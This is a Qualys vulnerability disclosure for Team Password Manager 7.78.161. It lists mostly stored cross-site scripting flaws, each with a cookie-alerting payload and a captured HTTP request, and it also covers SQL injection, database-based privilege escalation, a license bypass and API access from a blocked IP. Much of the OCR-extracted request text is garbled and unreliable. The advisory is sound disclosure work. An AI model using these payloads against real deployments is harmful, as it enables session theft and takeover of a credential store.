Qualys Security Advisory QSA-2018-03-08 


March 08, 2018 


Team Password Manager Multiple Security Vulnerabilities 


SYSTEMS INFORMATION: 
Version: 7.78.161 


Vendor URL : http://teampasswordmanager.com/ 


VULNERABILITY DETAILS 


Vulnerability #1: Stored Cross-site Scripting — Password Tag 


Stored Cross-site Scripting vulnerability found in Password tags field. A user can create/modify 
Password and assign tags to it. User can inject the malicious code in tags field which will be 
executed whenever the page is loaded in browser. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/pwd/aj_edit_save/0 


Parameters: tags, hidden_tags 


As Normal user, Project Manager and IT user roles have permissions to create new password in 
assigned project. Using this vulnerability an attacker can control application by getting session 
cookie of any logged in user, which could also be ‘admin’ user. 


How to reproduce: 


1. Click on "New Password" button. 
2. Select any project. 


3. Add following script in "Tag" field and press Enter or comma (,) 
"> <script>alert(document.cookie) </script> 


OST /tpm/ index .php/pwd/aj_edit_save/O NTTP/1.1 
| E 


sex~Agent: Mowilla/S.0 (Windows IT 10.0; Winé4; x€4; rv:50.0) Gecko/20100101 Firefox/ 50.0 
on, text/javascript, */*; q=0.01 
cept-Language: en-US, en;q=0.5 
cept-Encoding: gaip, deflate 
index .php/pwd/view/ 20 
e: appl ication/x-www-form-urlencoded; charsew=UTI-0 


ent-Length: 462 
e PHPSESS D Anna 
on: close 


EHHH | 
4 
b 
y 


ect_id=16épassword_id=Oénamenewpassétags=chidden-tags=8220IE02Cscr ipe NIL al ert (document cookie) ¥2C82Pscxipt¥IEeaccess_info=https¥JA0l Tei fwew. facebook. coméfa 


utefill2=éemail suser1td0user. coméfakepwddonotautof ill l=cpassword@abcdl>24épassword_visibl e=abcdl2246fakepwddonotautof ill 2=crepeat_password™abcdl224érepeat_p 


4. When next time you open that project it will show alert box with session cookie 


Ei Home @Users/Groups EBlog 4% Settings N <2; 


PHPSESSID=nv84kp0Soidbrcughb4cevSek5 


sini ka 
Cc a = 


Filter Tree 


Vulnerability #2: Stored Cross-site Scripting — Project Tag 


Stored Cross-site Scripting vulnerability found in Project and Subproject tags field. A user can 
create/modify Project and assign tags to it. User can inject the malicious code in tags field which 
will be executed whenever the page is loaded in browser. 


URL: http://<server ip>/<tpm path>/index.php/prj/aj_edit_save/O 


Parameters: tags, hidden_tags 


RISK FACTOR: High 


As Project Manager and IT user role have permissions to create new Project in assigned project. 
Using this vulnerability an attacker can control whole application by getting session cookie of 
any logged in user, which could also be 'admin' user. 


How to reproduce: 


1. Click on "New Project" button. 

2. Fill project name. 

3. Add following script in "Tag" field and press Enter or comma (,). 
"> <script>alert(document.cookie) </script> 


POST /tpm/ index php/pr3/aj_edit_save/0 HTTP/1.1 

Host 

User-Agent: Mosilla/S.0 (Windows NT 10.0; Winé4; x64; rv: 58.0) Gecko/ 20100101 Firefox/58.0 
Accept: application/json, text/javascript, */*; q=0.01 

Acce) 
Accept-Encoding: gaip, deflate 

Refe N ide - php/ pwd/ view 45 


Content-Type: appl ication/x-wew-form-urlenceded; charset=UTF-8 


Language: en-US,en;q=0-5 
E: 


X-Requested-With: XMLHetpRequest 
Content-Length: 175 
Cookie: PHPSESSID 


Connection: close 


esrft=SlactSacaefcISéafad4b 26 aSE24c£ lEeZabATéproject_id=Ocparent_id=Oéname=newproject étags=shidden-tags=t228IEeICscriptsIEal ert (document cookie) *9C¥2Pscript8IEénotes=newtproject 


4. When next time you list all the projects, it will show alert box with session cookie. 


= C | O EE ndes php/prj/view/16 


Ea Home @& Users / Groups [Log $ Settings E says 
PHPSESSID=98996n100jk3nno0hcj13gccr5; TPM_LANG=ssssss 


Cc 


Filter Tree 


Vulnerability #3: Stored Cross-site Scripting — Project Name 


Stored Cross-site Scripting vulnerability found in Project and Subproject Name field. A user can 
create/modify Project. User can inject malicious code to execute from password page. 


URL: http://<server ip>/<tpm path>/index.php/prj/aj_edit_save/0 


Parameter: name 


RISK FACTOR: High 


As Project Manager and IT user role have permissions to create new Project in assigned project. 
Using this vulnerability an attacker can control whole application by getting session cookie of 
any logged in user, which could also be 'admin' user. 


How to reproduce: 


1. Click on "New Project" button. 
2. Add following script in "Name" field and fill other details. 
“ onclick=alert(document.cookie) tag 


POST /tpm/ index. php/pr3/aj_edit_save/0 HTTP/1.1 

Host: 

User-Agent: Mosilla/5.0 (Windows NT 10.0; Winé4; x64; rv:58.0) Gecko/ 20100101 Firefox/ 58.0 
Accept: application/json, text/javascript, */*; q=0.01 
Accept-Language: en-US,en;q=0-5 

Accept-Encoding: gsip, deflate 

Referer: EE index -php/ pr3/view/ 44 
Content-Type: appl ication/x-www-form-urlencoded; charset=UTF-8 
X-Requested-With: XMLHttpRequest 

Content-Length: 143 

Cookie: PHPSESS M= TPM LATG=en 


Connection: close 


esrft=£SfalOSSfO782eelb4c1SG8EO0 lc lOdEl7£Gfadaléproject_id=Oéparent_id=Oéname=t22t+oncl ick*3Dalert (document .cookie)+tagétags=shidden-tags=énotes 


3. Open above created Project. 
4. Click on “New Password” button. 
5. Fill all the fields on New Password page and submit the page. 
6. Now Go to view all the passwords. 
7. Click on the project above created project, it will alert a popup with session cookie. 
79 Ct © SUE 0.61. php/pwa/all E - ¥ | | Q Search Y 


PHPSESSID=f2gluf6kcmmcfqurShl1th8074; TPM_LANG=en 


e] 


Vulnerability #4: Stored Cross-site Scripting — Password Access Information 


Stored Cross-site Scripting vulnerability found in Password Access information field. A user can 
create/modify Password and add/modify access information of the specific Password. User can 
inject malicious code to execute from password page. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/pwd/aj_edit_save/0 
Parameters: access_info 


As Normal user, Project Manager and IT user roles have permissions to create new password in 
assigned project. Using this vulnerability an attacker can control whole application by getting 
session cookie of any logged in user, which could also be 'admin’ user. 


How to reproduce: 


1. Click on "New Password" button. 
2. Select any project. 
3. Add following script in “Access” field and fill other details: 


http://www.test.com/"<img src=a onerror=alert(document.cookie )> 


POST /tpa index. php/pwa/aj_edit_save/0 MITP/1.1 
Hos 


e 
User-Agent: Mewilla/S.0 (W: 


ws WT 10.0; Winé4; x€4; rv:50.0) Gecko/20100101 Firefox/ 50.0 


Referer: ME index php/px3/view 4E 
Content-Type: appl icat ion/x-www-form-urlencoded; charset=UTF-8 


Cookie: PHPSCSS Dm TPL AITG=en 
Connection: close 


caxfe=€lle23220£20£576 IheaSda? lat EG 1E22d76014beproject_id=46 spassword_id=Ocnane"newpassctags=chidden-eags™faccess_int. 
ketext donot autof ill 1=cusername=éf aketext donot autof ill >=<cemail =¢fakepwddonot autof ill 1=¢password=épassword_ vis ibl e=<¢fakepwddonot autofill==<repeat_password=<repeat_password visibl 


4. When next time you open the project or view all the passwords the above payload will 
get executed and it will show alert box. 


2) 
<)> Cù O A (0: e.php/pws/active OB ow w| |Q Search 


PHPSESSID=f2glufékemmcfqur5hi1th8074; TPM_LANG=en 


em] 


Vulnerability #5: Stored Cross-site Scripting — Import Passwords 


Stored Cross-site Scripting vulnerability found in Import Password functionality. All above 
mentioned vulnerabilities can be exploited using the import password functionality. This 
functionality allows user to import passwords and its information through csv format. If csv file 
contains vulnerable payloads for respective vulnerability, then it is possible to exploit it from 
three different locations. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/settings/import_upload 


Parameter: access_info, tags, name 


If the user uploads the vulnerable CSV file, then there is possibility of exploiting the application 
and getting the full control of application through ‘admin’ role. 


How to reproduce: 


1. Create CSV file with the format given on csv help page. 
2. Put payload at the respective locations. Following is the sample csv file with each 
representing each payload. 
Project Name Payload 


" onclick=alert(1) tag,ddd 


POST /tpw/ index .php/ sett ings/ import_upload HTTP/1.1 

Host 

User-Agent: Mosilla/5.0 (Windows NT 10.0; Winé4; x64; rv:50.0) Gecko/ 20100101 Firefox/ 50.0 
Accept: text/html , appl ication/xhtml+xml , appl icat ion/xml ;q=0.$,*/*;q=0.0 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gaip, deflate 

Referer / index _php/ sett ings/ import 

Content-Type: mult ipart/form-data; boundary=--------------------------- 2004240252200 
Content-Length: 465 

Cookie: PHPSESS ID JH TPM LATG=en 

Connection: close 


Upgrade-Insecure-Requests: 1 


ababaka 2084248252280 


Content-Disposition: form-data; name="csrft" 


£1e76a84d2e6720e 0811 7£OHESSST£ELSSOSHESOE 
babakal 2084248252280 


Content-Disposition: form-data; name="parent_id" 


alata taal etait 2084248252280 
Content-Disposition: form-data; name="userfile"; filename="a.csv" 


Content-Type: appl ication/wnd.ms-excel 


""" onclick=alert(1) tag",ddd 


2064240253200-- 


Password Access Information Payload 


Myproject,ddd, http://www. google.com/"<img src=a onerror=alert(2)> 


= 


POST /tpm/ index.php/ sett ings/import_upload HTTP/1.1 

Host: NA 

User-Agent: Momilla/5.0 (Windows NT 10.0; Winé4; x64; rv: 58.0) Gecko/20100101 Firefox/ 58.0 
Accept: text/html , appl ication/xhtml+xml , appl icat ion/xml ;q=0.$,*/*;q=0.8 
Accept-Language: en-US,en;q=0_5 

Accept-Encoding: gsip, deflate 

Referer j index .php/ sett ings/ import 

Content-Type: mult ipart/form-data; boundary=--------------------------- 12258119750 
Content-Length: 496 

Cookie: PHPSESSID=4r72204mv3pi0milpeat$g557; TPM_LANG=en 

Connection: close 


Upgrade-Insecure-Requests: 1 


wenn ene nnennencenseasenannn= 12356119750 


Content-Disposition: form-data; name="csrft" 


82£647d7af85a34SEc1217c4e883cEdazza7Z£ed 
ahaaa enn nennnnnnnnanenn nnn 13256119750 


Content-Disposition: form-data; name="parent_id" 


12444444220040 12258119750 
Content-Disposition: form-data; name="userfile"; filename="a. csv" 


Content-Type: appl ication/vnd.ms-excel 


lyproject,ddd, "http://www. google.com ""<img src=a onerror=alert(2)>" 


gega aana a ana a a aaa a aa ata kaa 132356116750-- 


Password tags Payload 


Myproject,ddd, http://www. youtube.com/, User1,,test,Notes, 


POST /tpm index -php/ sett ings/import_upload HTTP/1.1 

Host: 

User-Agent: Mosilla/5.0 (Windows NT 10.0; Winé4; x64; rv:58.0) Gecko/20100101 Firefox/ 58.0 
Accept: text/html ,application/xhtml+xml ,application/xml ;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0-5 

Accept-Encoding: gsip, deflate 

Referer: | index php/ sett ings/ import 

Content-Type: multipart/form-data; boundary=--------------------------- 219892077112208 
Content-Length: 526 

Cookie: PHPSESSID=4r7r204mvjpi0miilpca29g557; TPM_LANG=en 

Connection: close 


Upgrade-Insecure-Requests: 1 


baa kaa 219892077112208 
Content-Disposition: form-data; name="csrft" 


8EdSdb2IhaSh2086eSESESSObZ0cadehSGeaSch2 


kaanane 219892077112208 
Content-Disposition: form-data; name="parent_id" 


eee AN e ana 219892077112208 
Content-Disposition: form-data; name="userfile"; filename="a. csv" 
Content-Type: appl ication/wnd.ms-excel 


Myproject ddd, http://www. youtube.com ,Userl, test Motes, "{"><svg onload=alert(2)>" 


sor ern en re renee nn nnnnnnnn nnn = 319892077112208-- 


3. Now Upload the file from Import Password page. 


4. Next time when you open the respective Project or View all Passwords, the payload will 
get executed. 


Project Name payload execution 


(e)> C ù [o /index.php/pwd/active Ø e. | Q Search 


Password Access Information payload execution 


<-¢o0 [© Jindex.php/pwd/active B & f| Q Search 


Password Tags payload execution 


e)> Cù oM oewis? E e D wy | Q search 


Vulnerability #6: Stored Cross-site Scripting — My Passwords Access Information 


Stored Cross-site Scripting vulnerability found in Password Access information field on “My 
Password” page of all users. A user can create/modify Password and add/modify access 
information of the specific Password. User can inject vulnerable script to execute from password 
page. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/mypwd/edit/<pwdid> 


Parameter: access_info 
How to reproduce: 


1. Go to “My Password” page by clicking on link on upper right hand corner (near logout 
button). 

2. Click on “New Password”. 

3. Add following script in “Access” field and fill other details: 
http://www.test.com/"< svg onload=alert(10)> 


POST /tpav index. php/mypwa/edit/12 MTTP/1.1 
Nose: ME 


User-Agent: Mosilla/5.0 (Windows NT 10.0; Winé4; x€4; rv:50.0) Gecko/20100101 Firefox/50.0 
Accept: text/html , appl ication/xheml+txml , app] icat ion/xml ;q=0.$, */*;q=0.0 
Accept-Language: en-US,en;q=0.5 

c coding: gaip, deflate 


inder.php/ mypwa/ ediv/12 

ype: appl icat ion/x-www-form-urlenceded 

ength: 250 

e: PHPSESSID=kbpeg®cvsvlt048033pjqcmbh0; TPM_LANG=AAAAAAAAAA 
Connection: close 


4. Now when a user views passwords by clicking on “All Passwords” link, above code will 
get executed. 


(€)> X @ | © E -o Qg 


Vulnerability #7: Stored Cross-site Scripting — Import My Passwords 


Stored Cross-site Scripting vulnerability found in Import Password functionality of My Password 
Page. Above mentioned vulnerability can be exploited using the import password functionality. 
This functionality allows user to import passwords and its information through csv format. If csv 
file contains vulnerable payloads for respective vulnerability, then it is possible to exploit it from 
three different locations. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/mysettings/import_upload 


Parameter: access_info, tags 
How to reproduce: 


1. Create CSV file with the format given on csv help page. 

2. Put vulnerable payload at the respective locations. Following is the sample csv file with 
each representing one payload. 

3. Go to “My Password” page by clicking on link on upper right hand corner (near logout 
button). 

4. Click on “My Settings” and navigate to “Import My Passwords” 

5. Upload above created csv: 


Password Access Information Payload 


http://www.facebook.com/"<iframe onload=alert(5)> 


POST /tpm/ index .php/mysett ings/ import_upload HTTP/1.1 

Nose: ME 

User-Agent: Mosilla/ 5.0 (Windows NT 10.0; Winé4; x64; rv:58.0) Gecko/ 20100101 Firefox/ 58.0 
Accept: text/html , appl ication/xhtml+xml , appl ication/xml ;q=0.9,*/*;q=0.8 

Accept-Language: en-U3,en;q=0.5 

Accept-Encoding: gsip, deflate 


Referer: index .php/mysett ings/ import 

Content-Type: multipart/form-data; boundary=------- 999 n nnn nnn nnn nnn nn 465728595232195 
Content-Length: 417 

Cookie: PHPSESS ID=kbpegScvsv1t04603jjpjqcmbh0; TPM_LANG=AAAAAAAAAA 

Connection: close 


Upgrade-Insecure-Requests: 1 


SSS SSN el GRN S ress baa abaan 46572859523195 
Content-Disposition: form-data; name="csrft" 


8b29687949772507974726b95d42172alff7e4la?7 

a pan din ann E pai win ia kan bA e a B o kn ia aaf aah MAA a AN aaa A a Kan, 46572859522195 

Content-Disposition: form-data; name="userfile"; filename="a.csv" 
Content-Type: appl ication/wnd.ms-excel 


mypass, “http: //www.facebook.com/""<iframe onload=alert(S)>"sereecreccrceceeree 


aati ata aatat a ata 46572059522195-- 


6. Now when a user views passwords by clicking on “All Passwords” link, above code will 
get executed. 


© EEE -r se | | Q search 


Vulnerability #8: Stored Cross-site Scripting — My Password Tag 


Stored Cross-site Scripting vulnerability found in My Password tags field. A user can 
create/modify Password and assign tags to it. User can inject the malicious code in tags field which 
will be executed whenever the page is loaded in browser. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/mypwd/edit/0 


Parameters: tags, hidden_tags 


As Normal user, Project Manager and IT user roles also have permissions to create new 
password in assigned project. Using this vulnerability an attacker can control whole application 
by getting session cookie of any logged in user, which could also be 'admin’ user. 


How to reproduce: 


1. Click on "New Password" button. 

2. Select any project. 

3. Add following script in "Tag" field and press Enter or comma (,). 
"> <script>alert(document.cookie) </script> 


POST /tpm/ index .php/mypwd/edit/O NTTP/1.1 

Host 

User-Agent: Mosilla/$.0 (Windows BT 10.0; Winé4; x€4; rv: $0.0) Gecko/20100101 Fixefex/ 50.0 
Accept: text/html , appl icat ion/xheml+xml , app] icat ien/xml ;q=0.$, */ *; q0. 0 
Accept-Language: en-US, en; q™0.5 

Accept-Encoding: gaip, deflate 

Referer: MEY index. php/mypwd/ add 

Content-Type: appl ication/x-www-form-urlenceded 

Content-Length: 256 

Cookie: PHPSESSID=1ql7e7dspm$elé4oOvebuutakS; TPM_LANG=EEteeeeete 
Connection: close 

Upgrade-Insecure-Requests: 1 


esrft=755Sfalc1Sb1SSScZetht408c4dthé 76222 I02bEcpassword_id=Ocnamemewpassétags=Ghidden-tags=0228I08ICscr ipe NIL al ert ¥2odocument .cookiet=S¥ 
textdonovauvofill2=cemail =f akepwddonot auvef ill 1=spassword=spassword_visible=ctakepwddonot autot ill =-arepeat_password=arepeat_password vis 


2Psczipt eI paccess_info=restctaketextdonotautof ill 1=cusername=ctake 


4. Now Copy or Move the Password to Project. 
5. When next time you open that project it will show alert box with session cookie 


<) Cù ® 192.168.0.8/tpm/index.php/prj/view/66 E = © f| Q Search 


PHPSESSID=ed2rqb68stdqcfr86etfor3105 
[C] Prevent this page from creating additional dialogs 


me] 


Vulnerability #9: Stored Cross-site Scripting — Group Name 


Stored Cross-site Scripting vulnerability found in Group Name field. A user can create 
new/modify group and add users to it. User can inject the malicious code in Group Name field 
which will be executed whenever the page is loaded in browser. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/groups/edit/<group_id> 


Parameter: name 


How to Reproduce: 


1. Add group with name: “><script>alert(‘xxx’)</script> 


————————— —X— —_—_————_—_—__O_SS 
POST /tpm/ index .php/ groups/edit/4 NTTP/ 1.1 

Host: 

User-Agent: Mosilla/5.0 (Windows NT 10.0; Winé4; x64; rv:58.0) Gecko/20100101 Firefox/ 58.0 
Accept: text/html , appl ication/xhtml+xml , appl ication/xml ;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gsip, deflate 

Referer: I in. ac. prp/ gr oups/edit/4 

Content-Type: appl ication/x-www-form-urlencoded 

Content-Length: 116 

Cookie: PHPSESSID=02pj2cpownjf03ppburcpe2507; TPM_LANG=ffffffffff 

Connection: close 


Upgrade-Insecure-Requests: 1 


esrft=S7£If23I2ElfacEeSSHdddlSOlL0eOfleEhbOIEcSGégroup_id=Hename=*l 7 e3E*ICscripteIEalert*elO*l Txxx tl 7el°SeICelPscriptesE 


Assign one user to a group 

Go to User/Group Tab 

Open above user’s data page. 

This page will show this users all information. 

From here admin/IT user can remove this user from groups. 

When the admin/IT user will click on the cross sign, it will redirect to different page and 
payload will get executed, as shown below: 


Sy hg eS 


Data Log Passwords Projects 


Username: a 
E-mail address: a@acd.com 


Role: It 
Language: Not set, using the default language: en - English 


Groups: "<script alenoolsciee | x ] 


Add the User to a Group 


Vulnerability #10: Stored Cross-site Scripting — Group Name 


Stored Cross-site Scripting vulnerability found in Group Name field. A user can create 
new/modify group and add users to it. User can inject the malicious code in Group Name field 


which will be executed whenever the page is loaded in browser. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/prj/getmembers/<group id> 


Parameter: name 
How to Reproduce: 


1. Add group with name: “><script>alert(‘xxx’)</script> 


—_ 
POST /tpm/ index.php/ groups/edit/4 HTTP/1.1 


User-Agent: Mosilla/5.0 (Windows NT 10.0; Winé4; x64; rv:58.0) Gecko/20100101 Firefox/ 58.0 


Accept: text/html ,appl ication/xhtml+xml , app] ication/xml ;q=0.S,*/ *;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gsip, deflate 

Referer ee ee index .php/ groups/edit/4 

Content-Type: appl ication/x-www-form-urlencoded 

Content-Length: 116 

Cookie: PHPSESSID=03pj3cpowujf03pphurcpel507; TPM_LANG=ffffffffff 
Connection: close 


Upgrade-Insecure-Requests: 1 


esrfit=S7£2ET33LElEacEeSSHdddlS610e0FleEbOIEcSGégroup_id=Hname=*l 2 e3E*ICscripteIEalerteloel7axx tl 7elSeICelPscripte3zE 


2. Open any Projects page 
3. Click on Security button. 


test 
Project: PMproject [E] 


Edit Notes Upload File 


| Edit password security 


Data Security Log 


On the Security Page, click on Groups tab. 
This tab will list all the groups created in application. 


SO? oe 


Custom Fields Security Locking Ext. Sharing 


Duplicate Copy Move 


Get the mouse over the members link besides above created group. 
When mouse is over the members link, application sends ajax call to get the list of 


members in the group and it also executes payload present in group name field. 


Vulnerability #11: Stored Cross-site Scripting — Email Configuration 


Stored Cross-site Scripting vulnerability found in SMTP user field on the SMTP configuration 
page. A user can add/modify SMTP Configuration. User can inject the malicious code in SMTP 
user field which will be executed whenever the page is loaded in browser. 


RISK FACTOR: 


URL: http://<server ip>/<tpm path>/index.php/settings/edit_mail_config 
Parameter: eus 
How to Reproduce: 


Go to Settings tab. 

Click on Email link on Left side 

Click on SMTP Server Configuration 

Enter following in SMTP user field: 

Check the checkbox of “Use the SMTP User as the email sender (otherwise it will use the email 
of the user). If selected, the SMTP User must be an email address.” 

6. Fill the detail on the page and Save the page. 


aw P wn bP 


SMTP Host localhost Leave blank to delete SMTP configuration 
TLS/SSL Encryption (none) { 
SMTP Pot |25 
SMTP User <img src=a onerror=alert(‘smtperror’) 
SMTP Password COTTI] 


|v] Use the SMTP User as the email sender (otherwise it will use the email of the user). If selected, the SMTP User must be an email address. 


7. Click on “Send test email (to yourself)” button. 
8. It will execute payload and show alert box 


smtperror 


[sal 


Vulnerability #12: Stored Cross-site Scripting —Additional Data in Log 


Stored Cross-site Scripting vulnerability found in Logs. Whenever user uploads any file through 
project page, log with file name gets generated and can be seen in Log Tab. User can inject the 
malicious code in file name field, which will be executed whenever the page is loaded in browser. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/files/do_upload/pwd/<pwd id>/js 


http://<server ip>/<tpm path>/index.php/files/do_upload/prj/<project id>/js 


Parameter: filename 
How to Reproduce: 


1. Goto a Project. Click Upload File. 

2. Click Browse. Select a file to upload. 

3. Start Burp Intercept & click upload. 

4. Add XSS payload on the file-name field as below: 


POST request to ES ndex.php/files/do_upload/prj/3/js - Oo x 


Previous | Next Action | 


Original request | Edited request | Response 


{ Raw Params | Headers | Hex 


Firefox/S8.0 
Accept: */* 
Accept-Language: en-US,en;q=0.5 


Accept-Encoding: gzi deflate 


content-Length: 481 

Tontent-Type: multipart/form-data; 

2OUNdAL V8 —- = {{Ė {Á 285162711510935 
cookie: PHPSESSID=Snmanuslmjsk7Sé40S39qgehkS 
connection: close 


sanan enakan sapaan nag na pana kaanan kakenan anga naa 285162711510935 
Jontent-Disposition: form-data; name="userfile"; filename="><img src=x 
" 


zontent-Type: text/plain 
ifdsfsdfsdť 


-2-2-1441 285162711510935 
zontent-Disposition: form-data; name="notes" 


..---------------------- 285162711510935 
zontent-Disposition: form-data; name="csrft" 


2 < + > ><img src=x onerror=alert(upload-file-delete-XSS)> 1 match 


5. Now go to Log Tab, it will execute the payload. 


= Activity Log | TeamPassword!) X 


KO D J) /indexphp/alog “Ow mn Oo = 


uptoac-file-delete-XSS 


[ok] 


6. Payload is executed for all the actions like “Upload File, Edit File Notes, View file notes, Delete 
File” 


Vulnerability #13: License Bypass 
A person who has access to database can bypass the number of users’ license. 
RISK FACTOR: 
How to Reproduce: 


1. Create users and deactivate few of them. 


All users Name Username / E-mail address Role / N° Groups = State 
Filter by State Admin Admin KET) admin / Admin? 1 
Active testi test! / abod@scd. mio inactive 
Inactive = sk a 

Filter by Role: newact newact/dd@c.com mio | Aciwe | 
= test test / abed@123.com Normal user 10 [Actve 
Normal user userenum userenum / userenum@dt Project manager / 1 
Project manager 

Read only Ghost User ghost user / ghost@focalhost localdemain Read only / 1 


Filter by Group: 
test 


Total rows: 6 


2. Now application will allow to create more users as per license. 


3. Now change the contents of ‘active’ column of ‘wmm users’ table and make it as 1 for 
all deactivated users. 


4. Now application has more active users than license. 


Search Users 


ion is corrected yo 


bsite: hitp:/teampasswordmanager.com/buy 


Role / N° Groups = State 


test1 test! / abcd@scd.com T/0 | Active | 


All users 


newact newact/ dd@c.com IT/0 


Normal user / 0 | Active | 


Fite 


Admin 
T 


Normal user 


Project manager 


Read only Ghost User ghost user / ghost@localhost localdomain 
Filte: 
test’ 


kani Total rows: 6 


Team Password Manager - teampasswordmanager.com - EULA and other licenses - Help - Advanced Search Help 


Vulnerability #14: Privilege Escalation 


A valid user, who also has access to Database can escalates its role by just changing the one value 
in Database ‘wmm_ users’ table. 


TPM is password management application and may contain credential information across various 
projects or departments. The team managing operating system and database systems should not get 
access to other project credentials in any way. 


Using privilege escalation issue a user which has control over backend database may modify 
permission level and get access to TPM application as "admin" level user. This allows user to 
control TPM application fully and access all project credentials available in application. 


RISK FACTOR: Medium 
How to Reproduce: 


1. Create one user with minimum privileges. 


Username: 


E-mail address: dd@c.com 


Name: newact 


Role: | Read only 


Language: Not set, using the default language: en - English [jy IE ENG 


Groups: — Add the User to a Group 


3. The ‘newact’ user now will have admin privileges. 


Username: newact 


E-mail address: dd@c.com 


Name: newact 


Role: Admin 
Language: Not set, using the default language: en - English [eji EEE 


Groups: | Add the User to a Group 


Vulnerability #15: API Access from Blocked IP 


Web Application denies access to IP, which is blocked from ‘IP address blocking’ page. But 
Application resources can be accessed through API. 


RISK FACTOR: Medium 
How to Reproduce: 


1. Block any IP from ‘IP address blocking page. 


(Eg Home Bsers / Grou EBlLog $ Settings 


Overview 
Version checker IP Adress Blocking Configuration 
Licenses 
Your IP address: 192.168.0.6 
Export / import 
Email 


Blocked IP Addresses Automatic Blocking Settings 


Two-Factor Auth 


| Search IPs 


Pwd. generator 
LDAP authentication 
Timeout 


Encrypt DB Config 


s is added will not be blocke 


API 
Expiration AILIPs IP Address Type Creator Date/Time = 

Stes en Fiter by Type: Manual admin Mar 10, 2018 13:00 
Extemal Sharing Ta 

Languages Automatic Total rows: 1 


Team Password Manager - teampasswordmanager.com - EULA and other licenses - Help - Advanced Search Help 


2. Try to access, web application from blocked IP. It will show 403 page. 


http://192.168.0.8/tpm/ x\+ 


@ | 192.168.0.8/tpm/ 


Error 


Access Forbidden (Error 403) 


root@kali: ~ 6060 
File Edit View Search Terminal Help 
:~# ifconfig 

ethO: flags=4163<UP.RBROADCAST,RUNNING,MULTICAST> mtu 1500 

inet 192.168.0.7 | netmask 255.255.255.0 broadcast 192.168.0.255 

inet6 fe80::a00:27ff:fe65:545a prefixlen 64 scopeid 0x20<link> 

ether 08:00:27:65:54:5a txqueuelen 1000 (Ethernet) 

RX packets 15229 bytes 8019648 (7.6 MiB) 

RX errors © dropped © overruns © frame 0 

TX packets 12298 bytes 1756555 (1.6 MiB) 

TX errors 1 dropped © overruns © carrier 1 collisions 0 

device interrupt 19 base 0xd020 


lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 


inet 127.0.0.1 netmask 255.0.0.0 


inet6 ::1 prefixlen 128 scopeid 0x10<host> 

loop txqueuelen 1000 (Local Loopback) 

RX packets 22367 bytes 9150189 (8.7 MiB) 

RX errors © dropped © overruns © frame 0 

TX packets 22367 bytes 9150189 (8.7 MiB) 

TX errors © dropped © overruns © carrier © collisions 0 


Han A 


3. Access Application Resources using API from the blocked IP. Application allows to 
access its resources from blocked IP. 


File Edit Vie 


http://192,168,0.8tpmy x 


D [192.168.0.8 


Vulnerability #16: SOL Injection on Edit User page 


SQL Injection found on Edit User page. By changing the $group parameter in Request, causes the 
application show error message in browser, which also shows the hashed password of the user 
whose id is present in $user_id parameter. 


RISK FACTOR: Medium 


URL: http://<server ip>/<tpm path>//tpm/index.php/users/add_to_group/<user id> 


Parameter: group 
How to Reproduce: 


Go to User/Group tab and open any user data. 

Click on ‘Add the User to the Group’ button. 

Select the group in which you want to add that user. 

Click on “Save” 

In Burp modify the group parameter like below: 

POST /tpm/index.php/users/add_to_group/23 HTTP/1.1 

Host: xXxx.XXX.XXX.XXX 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 
Accept: text/html, ,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http://xxx.xxx.xxx.xxx/tpm/index.php/users/add_to_group/23 
Content-Type: application/x-www-form-urlencoded 

Content-Length: 68 

Cookie: PHPSESSID=4r50jvt00c8sddunqd0ckaki45; TPM_LANG=ffffffffff 
Connection: close 

Upgrade-Insecure-Requests: 1 


AR WN > 


csrft=7c3455dcec5d22cf64 1 9fed0Saf9 13 1aa8252430&user_id=24&group=18"' 


6. Following is the Response of above query: 


There has been the following exception, please send it to Team Password Manager support (http://teampasswordmanager.com/support/): 


ErrorException Object 


[message:protected] => Undefined index: 18'' 
[string:Exception:private] => 

[code:protected] => 8 

[file:protected] => /var/www/html/tpm/wmm/controllers/users.php 
[line:protected] => 1716 

[trace:Exception:private] => Array 


[0] => Array 
( 
[file] => /var/www/html/tpm/wmm/controllers/users.php 
[line] => 1716 
[function] => my error handler 
[args] => Array 


[0] => 8 
[1] => Undefined index: 18'' 
[2] => /var/www/html/tpm/wmm/controllers/users.php 
[3] => 1716 
[4] => Array 
( 
[id] => 24 
[data] => Array 
( 


[user_data] => Array 


[id] => 24 

[username] => a 

[email] => a@acd.com 

[password] => %V4$2a$11$yt90f9EfXn6IxFm8T.Vn.etsq8tBJJKICwLCnUCo2 ywx8KpEmZVnS 
[name] => test 


Vulnerability #17: SOL Injection on Edit Group page 


SQL Injection found on Edit Group page. By changing the $ user parameter in Request, causes the 
application show error message in browser. 


RISK FACTOR: Low 


URL: http://<server ip>/<tpm path>/index.php/groups/add_to_group/<group id> 


Parameter: user 
How to Reproduce: 


Go to User/Group tab and open any group data. 

Click on ‘Add the User to Group’ button. 

Select the user to be added in that group. 

Click on “Save” 

In Burp modify the user parameter like below: 

POST /tpm/index.php/groups/add_to_group/19 HTTP/1.1 

Host: 192.168.250.81 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 
Accept: text/html, ,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http://192.168.250.8 1/tpm/index.php/groups/add_to_group/19 
Content-Type: application/x-www-form-urlencoded 

Content-Length: 65 

